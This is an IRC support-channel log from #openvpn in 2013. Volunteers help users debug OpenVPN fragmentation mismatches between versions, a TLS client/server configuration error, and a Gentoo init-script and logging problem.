logged and dropped 15:34 < hatschi> let me do a bogus test: i remove fragment from the server, but leave it on the client.. 15:34 < pekster> Ultimately you want to try and correct the mismatch on the link-mtu, since that's probably the cause of the corruption 15:35 < pekster> I'm not well equipped right now to mess with reduced MTU links, but I'm curious what happens if I set up 2 lab networks with a standard 1500 MTU and link them across soemthing smaller, 146x as you suggest 15:35 < pekster> 2.2.x anad 2.3 15:36 < hatschi> just use a normal link (i'm also trying it within two vm's right now) and just add fragment 1400 / mssfix to both ends… 15:36 < hatschi> gotcha: removing fragment from server , leaving it on the client generates a working link with no warnings…. ;) 15:37 < pekster> And the server is your 2.2.x system? 15:37 < hatschi> i already updated the server to 2.3 and have the same issue. doesn't matter if the server is 2.2 or 2.3 15:37 < hatschi> let me see if i find the old 2.2 binaries for the client... 15:38 < pekster> Ah, so you didn't have this issue 2.2.2 to 2.2.2? But do have this issue if one or both peers is 2.3.0? 15:38 < hatschi> yep. 15:38 < pekster> Or am I misunderstanding that 15:42 < hatschi> okay… 2.2 client with fragmentation enabled to 2.3 with fragmentation disabled: MTU-Warnings, IP packet with unknown IP version=0 seen and non-working link. 15:42 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 15:42 -!- athetius_ [~sollux@athetius.com] has joined #openvpn 15:42 -!- roue_ [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 15:42 -!- Rienzilha [rien@sinas.rename-it.nl] has joined #openvpn 15:42 -!- zu_ [~zu@ks387228.kimsufi.com] has joined #openvpn 15:42 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 15:43 < hatschi> now i reenabled fragmentation on the server again -> now it's working with 2.3 server and 2.2 client. 15:45 < hatschi> so for me it seems that there is an issue with fragmentation in 2.3 client mode.. 15:45 < hatschi> pekster: do you have the chance to verify this? 15:46 < pekster> WOrks for me 2.3 to 2.3 15:46 < pekster> Do you explicitly need a 2.2.2 client? 15:46 < hatschi> it works for me with 2.2 client to 2.2 or 2.3 server but not with 2.3 client to 2.2 or 2.3 server. 15:47 < pekster> I'm using a minimal config: http://paste.kde.org/693710/ 15:47 < pekster> This works fine, no warnings on startup, etc 15:47 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 246 seconds] 15:47 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 246 seconds] 15:47 -!- athetius [~sollux@athetius.com] has quit [Ping timeout: 246 seconds] 15:47 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 246 seconds] 15:47 -!- Rienzilla [rien@sinas.rename-it.nl] has quit [Ping timeout: 246 seconds] 15:47 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 246 seconds] 15:47 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 246 seconds] 15:47 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 246 seconds] 15:47 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 246 seconds] 15:47 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has quit [Read error: Connection reset by peer] 15:47 -!- Netsplit *.net <-> *.split quits: Olipro, [fred] 15:47 -!- dazo is now known as dazo_afk 15:48 < hatschi> okay, i'm working with certificates but this shouldn't matter. 15:48 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 15:48 -!- Netsplit over, joins: [fred] 15:48 < pekster> Right, data channel is still secured using symmetric keys after startup (I suppose the options exchange would be different) 15:49 < pekster> But I get no problems pinging with packets at the link-mtu of 1500 with the fragmentation 15:49 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 15:49 < hatschi> is fragment server-pushable? 15:49 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 15:53 -!- bla [bla@vivane.thera.be] has joined #openvpn 15:53 -!- bla [bla@vivane.thera.be] has quit [Changing host] 15:53 -!- bla [bla@unaffiliated/bla] has joined #openvpn 15:53 -!- kirin` [telex@gateway/shell/anapnea.net/x-fqcxzfjrwhmymqfg] has quit [Read error: Connection reset by peer] 15:54 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn 16:01 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving] 16:01 < hatschi> pekster: i've also cloned 2 vm's right now. it works with the minimal config. i'll try to break down my config to reproduce this issue… 16:02 < pekster> Yea, sounds like a good plan 16:02 < hatschi> i hope this is not a windows related problem… ;) 16:04 -!- kloeri_ is now known as kloeri 16:22 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds] 16:31 < hatschi> pekster: still alive? 16:31 < hatschi> pekster: tracked it down... 16:32 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 16:33 < hatschi> pekster: this config reproduces the issue: http://paste.kde.org/693740/ 16:33 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:33 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Client Quit] 16:34 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 16:35 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving] 16:38 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 256 seconds] 16:40 < hatschi> pekster: it's quite late here, i'm going to bed now. i don't know if i have a change to pass by tomorrow… maybe you can reproduce this issue with the new config. the trick is to use remote [ip] [port] in configuration. this triggers the fragmentation misbehaviour... 16:41 < hatschi> by all 16:41 -!- hatschi [~marvin@dslb-092-074-209-205.pools.arcor-ip.net] has left #openvpn [] 16:47 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 248 seconds] 16:47 -!- bla [bla@unaffiliated/bla] has joined #openvpn 16:47 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 245 seconds] 16:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 16:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 255 seconds] 16:58 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 17:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:18 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 17:20 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 17:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 17:24 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 17:24 -!- Cpt_Oblivious is now known as Cpt-Oblivious 17:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:42 -!- Orbi [~opera@93.182.148.191] has left #openvpn [] 17:45 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 17:46 -!- p3rror [~mezgani@41.140.169.138] has quit [Client Quit] 17:51 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Quit: ZNC - http://znc.in] 17:52 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 18:01 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Excess Flood] 18:02 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has quit [Quit: leaving] 18:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 18:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-tyxibxesfaawsxwh] has joined #openvpn 18:07 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds] 18:13 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn 18:14 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 18:17 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:17 -!- mode/#openvpn [+v s7r] by ChanServ 18:22 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds] 18:24 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:24 -!- mode/#openvpn [+v s7r] by ChanServ 18:26 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 18:27 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 18:29 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 250 seconds] 18:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:31 -!- mode/#openvpn [+v s7r] by ChanServ 18:35 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds] 18:37 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:37 -!- mode/#openvpn [+v s7r] by ChanServ 18:40 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has left #openvpn [] 18:42 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 252 seconds] 18:45 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:45 -!- mode/#openvpn [+v s7r] by ChanServ 18:46 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 264 seconds] 18:47 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 18:48 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds] 18:50 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds] 18:53 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 18:53 -!- mode/#openvpn [+v s7r] by ChanServ 18:58 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 260 seconds] 19:00 -!- Wulf [~Wulf@port-35127.pppoe.wtnet.de] has joined #openvpn 19:00 -!- Wulf [~Wulf@port-35127.pppoe.wtnet.de] has quit [Changing host] 19:00 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 19:01 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 19:04 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 19:04 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in] 19:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 19:06 -!- Denial- is now known as Denial 19:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:07 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 19:20 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 19:20 -!- mode/#openvpn [+v s7r] by ChanServ 19:23 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 19:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:48 -!- raidz is now known as raidz_away 19:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:57 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 19:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:01 < vaillor> Options error: Parameter ca_file can only be specified in TLS-mode, i.e. where - -tls-server or --tls-client is also specified. 20:01 < vaillor> i get this error 20:01 < vaillor> what is it? 20:03 < pekster> Using the --ca directive isn't valid unless you're operating in a mode supporting X509 (TLS) authentication 20:06 < vaillor> so, what i need to do? 20:07 < vaillor> pekster: http://pastebin.com/5r2fubWt 20:07 < vaillor> this is my config 20:07 < vaillor> client side. 20:08 < pekster> Use a client mode of operation then. --tls-client at the very least, and possibly --pull as well. See the --client helper-directive for details on what it all includes 20:11 < vaillor> Sun Mar 10 00:31:02 2013 TLS Error: client->client or server->server connection attempted from [AF_INET]192.168.1.130:1194 20:11 < vaillor> WTF! 20:16 < pekster> One side of your connection must at as the "server" and the other the "client" 20:16 < pekster> --tls-server and --tls-client respectively 20:19 < vaillor> pekster, if i add " tls-server " into config.ovpn is the same? 20:20 < pekster> In what context? On your server? 20:20 < vaillor> yes 20:20 < pekster> You probably want both --tls-server and --mode server 20:21 < pekster> Or see the --server directive in the manpage. Use of --server implies a lot of things, including --mode server --tls-server --ifconfig and --ifconfig-pool setup for a "typical" server 20:21 < vaillor> pekster, can you tell me the correct line format that i need to add? 20:21 < pekster> That depends greatly on your setup 20:21 < pekster> There's no one "correct line" that fits everyone's needs. This is why sample configs are provided as a starting point with liberal comments to help you understand what they each do 20:21 < pekster> I'd rather teach you to understand what you need to do than just give you a config 20:22 < pekster> What specifically are you having trouble understanding? 20:23 < vaillor> pekster, i'm understanding how to give --tls-client and --tls-server into respective configuration files 20:23 < vaillor> if i add "--tls-client" into the configuration files, i get error 20:23 < pekster> So, the easiest thing to do is to use the "--server" direcive on the server. That options requires that you define a network and mask as paramaters for the virtual network your server will use 20:24 < pekster> Then use "--client" (no params needed) on the client, which has it act as a client and pull configuration from the server 20:24 < vaillor> ok, then i add "server" into server.ovpn 20:24 < vaillor> and client into client.ovpn 20:24 < vaillor> it's ok? 20:27 < pekster> Did you read the part above where I said the server directive takes paramaters? Did you look the paramaters up in the manpage or the sample config file in the howto? What did you learn about how you must apply your chosen VPN network range to this paramater? 20:29 < vaillor> I am very tired, I spent half a day to figure out how to create and configure certificates, I did. now I want to be slightly helped set up the other parameters. here in Italy is night 20:30 < vaillor> server: http://nopaste.info/c4f29251bb.html 20:31 < vaillor> client: http://nopaste.info/61d18b7e89.html 20:32 < pekster> Your server directive doesn't have the required format (manpage and samples are your friend.) You don't want to use ifconfig with server. You have tap on one side and tun on the other. Your comp-lzo settings are mismatched. 20:32 < pekster> The sample config file would be a much better place to start, as would following the howto 20:33 < vaillor> server 10.10.10.0 255.255.255.0 20:33 < vaillor> should be better? 20:33 < pekster> Yup 20:34 < pekster> Use the same 'dev' type on both sides, and remove your 'ifconfig' on the server. Please consult the manpage for the "--server" directive and you'll see it already includes that 20:34 < pekster> And comp-lzo needs to match on both sides of your setup 20:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:35 < vaillor> Sun Mar 10 00:56:02 2013 TLS Error: client->client or server->server connection attempted from [AF_INET]192.168.1.130:119 20:36 < vaillor> i get the same f*****g error 20:36 < vaillor> server 20:36 < vaillor> dev tap 20:36 < vaillor> proto udp 20:36 < vaillor> server 10.10.10.0 255.255.255.0 20:36 < vaillor> this is what i set into server side 20:37 < pekster> Why are you using tap? 20:37 < pekster> !tunortap 20:37 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 20:37 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 20:37 < pekster> Don't use tap unless you have a need for it. It's also invalid to use tap on one side a tun on the other, as you have done 20:38 < vaillor> never changed 20:39 < vaillor> http://pastebin.com/dwtdpx39 20:39 < vaillor> i'm still crying 20:40 < vaillor> this is client side config 20:40 < pekster> The pastes earlier showed tap on the server and tun on the client 20:40 < pekster> You *cannot* do this 20:40 < pekster> Square peg, round hole. 20:42 < vaillor> pekster, now is tun on both side 20:48 < vaillor> Options error: Unrecognized option or missing parameter(s) in config.conf:3: tsl-client (2.1.3) 20:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:57 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 20:59 < fulcan> I have 2 openvpn configurations for 2 different tunnel. prior to an update I had pretty init.d scripts that would launch each tunnel with their own config file. now so st00pid develeloper decided to change init and now the the only way I can get openvpn to work is with /usr/sbin/openvpn --config /etc/openvpn/connect.conf which is no good.. How do unfuq init? 21:00 < fulcan> init fails here -> VPNCONF="${VPNDIR}/${VPN}.conf" 21:01 < pekster> How about install the stock initscript for your distro? 21:01 < pekster> And teach your devs about revision control 21:02 < fulcan> pekster the stock is what is failing /etc/init.d/openvpn fails to find config file now 21:04 < fulcan> pekster 3 different systems got updated yesterday and all 3 share the exact same issue, at the same time. 21:05 < pekster> The "official" source package openvpn provides has an rhel and suse init setup. Other distros provide their own init systems 21:06 < fulcan> gentoo 21:06 < fulcan> here 21:06 < vaillor> pekster, please, can you tell me the right configuration? i'm becoming mad 21:09 < pekster> fulcan: Gentoo uses symlinks to determine the config name from the script 21:09 <@EugeneKay> Oy, gentoo. 21:09 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has quit [Disconnected by services] 21:09 <@EugeneKay> And you're surprised when the entire thing randomly eats its own head? :-p 21:09 < pekster> EugeneKay: Well, I like it, but I am quite familiar with how it works 21:10 < pekster> Better than having to figure out how to make one of the 2 VPNs running restart cleanly from an init system that isn't designed to uniquely control each process and just blindly starts them all in succession :( 21:10 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 250 seconds] 21:10 < pekster> (that was a Not So Fun Day in NetBSD land. I like a lot of what NetBSD does, but not that, on that day._) 21:11 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 21:11 < pekster> Did you anger the service gods? :P 21:11 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 21:11 < pekster> fulcan: So, you should have a symlink like /etc/init.d/openvpn.configname -> openvpn 21:12 < pekster> That will correspond to a config file at /etc/openvpn/configname.conf 21:12 < fulcan> pekster clear wireless service sux, but it's cheap too 21:12 < pekster> Unless you hacked the initsscript, that's how it's been that way for many years 21:16 < DougEFresh> ayo 21:16 < fulcan> pekster yes, I have 2 /etc/openvpn/openvpn.conf and /etc/openvpn/connect.conf which correspond with /etc/init.d/openvpn and /etc/init.d/openvpn.connect the two always worked together perfectly, for like 6 months and then a routine update yesterday broke it. I even tried setting a stating value VPNCONF="/etc/openvpn/openvpn.conf", but init failed to read the static value 21:17 < pekster> Nope, you want /etc/init.d/openvpn.openvpn if you have an openvpn.conf 21:17 < pekster> Note the initscirpt line for VPN=${SVCNAME#*.} 21:18 < pekster> That is pretty standard for gentoo's initscripts when they support multiple concurrent instances with independent init control 21:18 < pekster> It scrapes off the leading "foo." from the name you called the script with 21:18 < fulcan> o 21:18 < pekster> IMO that's also a very bad name for a config, but it's not disallowed ;) 21:19 < vaillor> TLS Error: client->client or server->server connection attempted from 192.168.1.130 21:19 < pekster> It's almost as silly as naming a network interfaces "net" and then you end up with a /etc/init.d/net.net interface ;) 21:19 < vaillor> sounds like a TSL handshake error 21:19 < vaillor> right? 21:20 < vaillor> i tried modifying some other stuff but i get the same thing 21:20 < pekster> s/interface/initscript/ 21:21 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 21:23 < fulcan> http://pastie.org/6457206 it doesn't like openvpn.openvpn either 21:24 < pekster> What do thte logs say? 21:24 < pekster> You should hopefully have configured your /etc/openvpn/openvpn.conf sanely to log somewhere helpful ;) 21:25 < pekster> The one dumb thing Gentoo does is try to change user on you. You can either disable this "feature" or just use 'user root' 'group root' in your configs to avoid such "intelligent" decisions 21:25 < pekster> That should be an opt-in feature, not opt-out, but it's managable if you know about it 21:26 < pekster> I guess it's more "secure" to do that, but it's unexpected 21:26 < fulcan> pekster the logs are completely bare of anything openvpn in messages. it is as though because of the disconnect from init, it is completely oblivious to system messaging. :/ 21:26 < pekster> Where are you logging? 21:27 < pekster> OpenVPN does not simply "not log" when it fails to start 21:27 < fulcan> messages 21:27 < pekster> So you have *no* log or log-append directive in your openvpn.conf file? 21:29 < pekster> fwiw, I guess the initscript should attempt to use openvpn.conf if you call it via /etc/init.d/openvpn (since there's no leading string matching "*." it won't remove anything.) It's still not a great idea to do that 21:31 < fulcan> pekster If I start it the long way and manually point it to the --config file, it logs normally. openvpn is throwing in some default config and it log nothing. 21:32 < fulcan> via init 21:33 < pekster> Can you add an echo in front of the start-stop-daemon in the initscript and paste what it spits out? 21:34 < fulcan> http://pastie.org/6457302 21:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 21:36 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out] 21:38 < fulcan> btw, I updated 5 systems yesterday and all 5 are having the same issue 21:38 < pekster> I want to know what ssd is doing 21:38 < pekster> YOu clearly didn't add an "echo" in front of that line 21:39 < pekster> http://paste.kde.org/693926/ 21:39 * pekster thinks he's getting the hang of this git thing... :) 21:40 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 21:48 < pekster> Either SSD is doing something wrong enough to fail to call /usr/sbin/openvpn properly, or the logs from openvpn get lost. Even at 'verb 0' openvpn still logs fatal errors that would prevent a startup 21:51 < pekster> fulcan: For the record, I can launch /etc/init.d/openvpn fine with /etc/openvpn/openvpn.conf 21:53 < pekster> Pastebin your openvpn.conf somewhere 21:53 < fulcan> are you on gentoo? and I am supposed to diff that code you sent and create a .patch? 21:54 < pekster> that link was a patch, but nevermind that; your config is at the moment more interesting to me 21:54 < pekster> (the "diff " at the beginning gives it away as a patch) 21:55 < pekster> And yes. I'm running 2.3.0 openvpn ~x86 on Gentoo. Initscript works finei 21:56 < pekster> Oh, and in the future symlink, don't copy init.d files 21:56 < pekster> Look at your net.* stuff for an example of how it's supposed to look 21:58 < pekster> Things should look like this: http://paste.kde.org/693932/ 22:00 < fulcan> http://bpaste.net/show/83107/ 22:01 < fulcan> http://paste.kde.org/693938/ 22:01 < pekster> -p0 likely 22:01 < pekster> Oh, hum... 22:02 < fulcan> the config file is perfect. it's just that init never gets it 22:02 < fulcan> same garbage output with -p0 22:03 < fulcan> cat /etc/openvpn/openvpn.conf|wgetpaste 22:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 22:05 < pekster> Oh, patsebin screwed up the patch spacing :( 22:06 < pekster> Not like it's a complicate change... 22:06 < pekster> +d 22:13 -!- TypoNe [~itsme@195.197.184.87] has quit [Quit: I shouldn't really be here - dircproxy 1.1.0] 22:13 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:18 < fulcan> I added the line echo start-stop-daemon --start --exec /usr/sbin/openvpn --pidfile "${VPNPID}" \ and still got no log output "manual patch". 22:21 < pekster> Then you did something wrong 22:22 < pekster> Output on your terminal should pretty obviously echo that to the terminal. http://paste.kde.org/693944/ 22:22 < pekster> Let me know if you manage to figure it out 22:23 < fulcan> pekster http://bpaste.net/show/83111/ 22:24 < pekster> Nope 22:24 < pekster> Add an echo 22:24 < pekster> Not add crap to the middle of ssd 22:25 < pekster> if /bin/whatever $stuff fails, you don't do /bin/whatever $stuff echo $morestuff. You do: echo /bin/whatever $stuff 22:25 < fulcan> pekster line 114? 22:26 < pekster> Remove/comment 113 22:26 < pekster> Note the backslash on the end? You're just spewing worthless (and inherently broken, since "echo" is not a command ssd knows) to the middle of a command 22:33 < fulcan> pekster in your patch you have an escape \ at the end of that line. You are saying "don't" escape line 114? I get a bad command error. 22:35 < ngharo> !fail2ban 22:35 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:35 -!- Teck7 [~teck7@76.65.61.190] has joined #openvpn 22:36 -!- vraa__ [~speed_rac@98.196.168.201] has joined #openvpn 22:36 < fulcan> ngharo it doesn't work very well 22:36 < ngharo> whys that 22:36 < fulcan> door gets stuck all the time 22:37 < fulcan> crap debugging (or what I could find) 22:37 -!- rfxn [~teck7@69.157.149.169] has quit [Ping timeout: 245 seconds] 22:38 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 22:42 < fulcan> pekster I got the echo to work, and it spit out the parameters, but nothing in the logs http://pastie.org/6457580 22:48 < fulcan> right now my tunnel is up 22:51 < pekster> You're logging to syslog, so the fact that you get "nothing" in messages suggests syslog isn't working right. You can always add 'log-append /tmp/openvpn.log' or something to the openvpn.conf file 22:52 < pekster> init looks fine 22:53 < pekster> There's likely an error starting openvpn and it's note getting sent to syslog. You need to fix your system logging 22:53 < pekster> not* 22:56 < fulcan> I got it up and now I can't repeat what I did 22:57 < fulcan> what am I missing /etc/init.d/openvpn.openvpn: line 114: --: command not found http://bpaste.net/show/83113/ ?? 23:00 <@EugeneKay> You have a trailing space on 113 23:01 <@EugeneKay> This is why \\n is evil 23:02 < fulcan> Well, get this, I'm up after removing trailing space and adding echo. If I remove echo, it won't restart. wtf? 23:03 < fulcan> at least I got a fix, but 'huh?' 23:08 < fulcan> but I came up under a different tun 23:16 < pekster> It'll "start" when using the echo because it's not actually starting the openvpn process 23:16 < pekster> Just echoing what it would do to call ssd 23:18 < pekster> You can scrape that off; the output you pasted earlier looks fine for what ssd should be doing 23:18 < fulcan> openvpn starts and I can see the ip on both tuns, but I cannot ping down the tunnel, nor can other connect to me. logs are still bare http://pastie.org/6457692 23:19 < pekster> Did you put the initscript back? 23:19 < pekster> Or at least duplicate the actuall start-stop-daemon command after the echo line? 23:21 < pekster> The lack of logs is a problem (as I said before, maybe your syslog isn't operating as you intended?) Add the 'log' or 'log-append' option to your configs manually to get proper log output sent at least somewhere useful 23:25 < fulcan> Nope, there is something deeper going on. even -> /usr/sbin/openvpn --config /etc/openvpn/connect.conf clients still cannot connect 23:26 * pekster thought the issue was starting it without it denoting failure 23:28 < fulcan> that was/is, don't know. The same config worked for 6 months and we restarted the machine many times since. this started after yesterday's update. 23:30 < fulcan> and at this point the 'omly' thing I have done, is add an echo to the front of that line in the init scripts. 23:32 < pekster> Right. Remove it. If you don't have much bash scripting, leaving it in is a debugging thing only and doesn't actually do anything to start your VPN. It just "echoes" what it would do 23:32 < pekster> (and I'm sorry to say if that's an issue, Gentoo probably isn't the right distro) 23:33 -!- wachpwnski [~wachpwnsk@67.176.229.52] has quit [Quit: Leaving.] 23:33 < fulcan> why would adding a echo be the difference between it starting and it failing to start? 23:33 * pekster sighs 23:33 < pekster> Becuase it's just printing text. It "successfully" printed the text 23:33 < fulcan> if I remove the echo, it won't start 23:33 < pekster> Right. because something is broken 23:33 < fulcan> the port goes up! 23:33 < pekster> http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn.init?view=log 23:34 <@vpnHelper> Title: [gentoo-x86] Log of /net-misc/openvpn/files/openvpn.init (at sources.gentoo.org) 23:34 < pekster> The initscsript hasn't changed in 3 years 23:34 < pekster> The "stupid developers" as you so aptly worded it, haven't touched the init 23:38 -!- brute11k [~brute@89.249.235.15] has joined #openvpn 23:39 < pekster> Check to make sure the changes you've made don't break something unintended: http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn.init 23:42 < pekster> Hmm, actually, no clue what that link is 23:42 < pekster> Sorry, ignore that last link 23:43 < pekster> This is the right one (upstream had a stupid naming scheme) http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn-2.1.init 23:43 < pekster> Erm, downstream 23:43 < pekster> :) 23:46 < pekster> k, init is indeed fine (once you fix the debugging thing.) The rest of your changes are cosmetic. My guess is any issues you have are a result of the user downgrading happening 23:51 < pekster> Make sure your init has been reverted (or better yet, just do 'cp /usr/portage/net-misc/openvpn/files/openvpn-2.1.init /etc/init.d/openvpn' to gaurentee it's fixed) and here's some proof of concept to run: http://paste.kde.org/693950/ (back up openvpn.conf first, since this'll overwrite it) 23:53 < pekster> If that fails, it'll be important to figure out why 23:53 < pekster> If not, it's something in your config that's the issue, possibly made worse by syslog issues 23:54 < pekster> Again, note that the initscirpt does not just "start the config" -- it adds options to the command-line call 23:55 < fulcan> fortunately I have good backups and am restoring to prior to update. 23:56 < pekster> Well, figuring out why would be better. clearly something changed (and it wasn't anything to do with the initscript.) 23:57 < pekster> OpenVPN hasn't had anything of note in the changelog since 09 Feb 2013, and that was a minor change to the up.sh script. Last change before that was 25 Jan 2013, adding 2.3.0 23:57 < pekster> No clue what "else" you updated, but I'm pretty confident your issue isn't the initscript or any change in gentoo's openvpn package/ebuild 23:58 < pekster> At least not the shipped initscript --- Day changed Tue Mar 12 2013 00:02 < fulcan> http://bpaste.net/show/83118/ 00:02 < fulcan> march 10 00:04 < pekster> So what? You build a package. Congrats. Maybe your compile screwed up. I'm talking about source changes. Things those of us who develop and contributed to Gentoo and/or OpenVPN code can actually do something about 00:05 -!- GabeTheBabe [~toomuchfo@75-170-24-37.eugn.qwest.net] has joined #openvpn 00:06 < pekster> Thanks for trying to blame us "st00pid dev"s. Protip: gentoo mgiht not be for you if you update 58 packages, none of them openvpn, and you attempt to blame the change on an initscript that hasn't changed for 3 years. I'm done. 00:07 < GabeTheBabe> Hello, is there anyone here that can help me with my issue? I've been getting this error on my vpn client since I connected my computer up to a tv. http://i.imgur.com/nTOpKfV.png 00:07 <@EugeneKay> http://funroll-loops.info/ 00:07 <@vpnHelper> Title: Welcome to Gentoo is 